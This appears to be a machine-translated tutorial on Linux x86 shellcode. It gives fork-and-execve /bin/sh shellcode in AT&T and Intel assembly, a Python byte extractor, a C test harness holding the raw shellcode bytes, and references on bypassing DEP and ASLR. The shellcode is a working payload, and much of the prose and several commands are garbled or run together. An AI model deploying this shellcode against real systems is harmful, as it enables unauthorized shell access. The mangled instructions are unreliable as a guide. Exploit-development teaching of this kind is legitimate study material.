Basic knowledge of exploit on linux

The shellcode on linux is slightly different from the shellcode on windows. The shellcode on linux is called by the system to execute the desired function. View the system call number cat/usr/src/linux-2.6.38.8/arch/x86/include/asm/unistd_32.h basically small kernel version changes will not change the system call number, so you can be assured to use

#define __NR_restart_syscall      0#define __NR_exit          1#define __NR_fork          2#define __NR_read          3#define __NR_write          4#define __NR_open          5#define __NR_close          6#define __NR_waitpid          7#define __NR_creat          8#define __NR_link          9#define __NR_unlink         10#define __NR_execve         11.....

 

From linux to shellcode, you can use intel to compile an assembly, or AT&T to compile an assembly. Of course, the compilation is the same (both x86 instruction sets). The linker is the same, but the assembler is different from the Linux Assembler: one of the biggest differences between GAS and NASMhttp: // merge ASM and GAS is the syntax. GAS uses AT&T syntax, which is a fairly old syntax used by GAS and some older assembler; NASM uses Intel syntax and most assembler supports it, including TASM and MASM. Therefore, you cannot use nasm to compile AT&T syntax files during compilation, and vice versa. ======================================================== Use at&t syntax

.global _start_start:        xor  %eax,%eax        or   $2,%eax        int  $0x80        test %eax,%eax        jnz  next        retnext:        xor  %eax,%eax        push %eax        #push $0x68736162 #/bin/bash        #push $0x2f2f2f2f        #push $0x6e69622f        push $0x68732f6e #/bin/sh        push $0x69622f2f        mov  %esp,%ebx #param2        push %eax        push %ebx            mov  %esp,%ecx #param2        mov  %eax,%edx #param3        or  $0xb,%eax    int  $0x80

 

Use the GAS assembler as-o hello. o hello. s to generate the symbol table as -- maid-o hello. o hello. s-chain adapter ld-o hello. o ld adds-s to the link to remove the symbol and add the-static parameter for static compilation. Here, the size of the static link remains unchanged because the Assembly Code does not reference any other libraries. ======================================================== Use intel syntax

Global _ start_start: xor eax, eax or eax, 2; fork int 0x80 test eax, eax jnz next retnext:; child process xor eax, eax push eax; push 0x68736162;/bin/bash; push 0x2f2f2f2f; push 0x6e69622f push 0x68732f6e;/bin/sh push 0x69622f2f mov ebx, esp; param1 push eax push ebx mov ecx, esp; param2 mov edx, eax; param3 or eax, 0xb int 0x80nasm assembler nasm-g-f elf hello. asm-o hello. old-o hello. o

 

The above two assembly languages will not talk about the details of the syntax gap. Several should note that the comments are different and the constants are also different ($ is added before at&t). In short, at&t's syntax is very strange. ========================================================== After compilation, the Disassembly tool objdump -- disassemble used to extract shellcode as a binary code. /hello abbreviation odjdump-d helloobjdump to disassemble is to identify the file format, if it is pure binary code such as the boot area, then the disassembly error such as objdump: read_1_track.boot.o: file format not recognized ndisasm-B 32-e 0x74 hello | head-n 15ndisasm disassembly does not need to recognize the File format, the above-e is the start offset of the disassembly process. We can see that the disassembly code includes bytecode. However, if the shellcode is long, it is still a little troublesome to manually copy the code, so I wrote a small python script to generate it.

#!/usr/bin/env python# -*- coding: utf-8 -*# author: SAIimport osimport sysif len(sys.argv)!=2:    print '%s shellcode_elfbin' % sys.argv[0]    sys.exit(0)cmdline='objdump -d '+sys.argv[1]print cmdlinerl=os.popen(cmdline).readlines()shellcode=''for i in rl:    cl=i.split('\t')    if len(cl)==3:        sl=cl[1].split(' ')        for code in sl:            if code!='':                s='\\x'+code                shellcode+=sprint 'char shellcode[]="%s";' % shellcodeprint 'shellcode size:%d' % (len(shellcode)/4)if shellcode.find('00')!=-1:    print '0x00 is in shellcode'

 

Then sometimes the shellcode we get from the Internet needs to be tested. You can write a C program for testing.

#include <stdio.h>#include <string.h>char shellcode[]="\x31\xc0\x83\xc8\x02\xcd\x80\x85\xc0\x75\x01\xc3\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\x83\xc8\x0b\xcd\x80";int main(){   (*(void(*)()) shellcode)();   printf("size:%d\n",sizeof(shellcode));   return 0;}

 

Compile g ++-g test. cpp-o test disassembly can be used to debug and observe what shellcode is (single-step commands from gdb to si) ====================================================== information on exploits of linux vulnerabilities: early articles about bypassing dep on linux can refer to warning3's "method of bypassing Linux unexecutable stack protection" and axis's "Bypass Exec-shield Under Redhat". The main idea is to return to libc. (including writing got tables ), however, because the database on the system is different, you can return to libc to the library function address is also different, so this method is not suitable for attacks, let alone aslr. To bypass ASLR to the article can refer to the ASLR bypass 2.6.17/20 Linux on Linux No-executable stack space Bypass Method, but for 2.6.17 before, the main idea is that linux-gate.so No aslr, but it has been supplemented after 2.6.20. In the xfocus article "Breaking Through ASLR protection and compiler stack protection", environment variables are used to solve the problem with random addresses. Can environmental variables be transmitted to programs in actual attacks? = For more information about HEAP, see HEAP/BSS overflow. In addition, the book "buffer overflow attack-detection, analysis and prevention" provides a good explanation of linux's shellcode (but other parts are general and not worth buying, for shellcode to write also can refer to the [Science] shunx Shellcode shellcode http://www.xfocus.net/articles/200805/980.html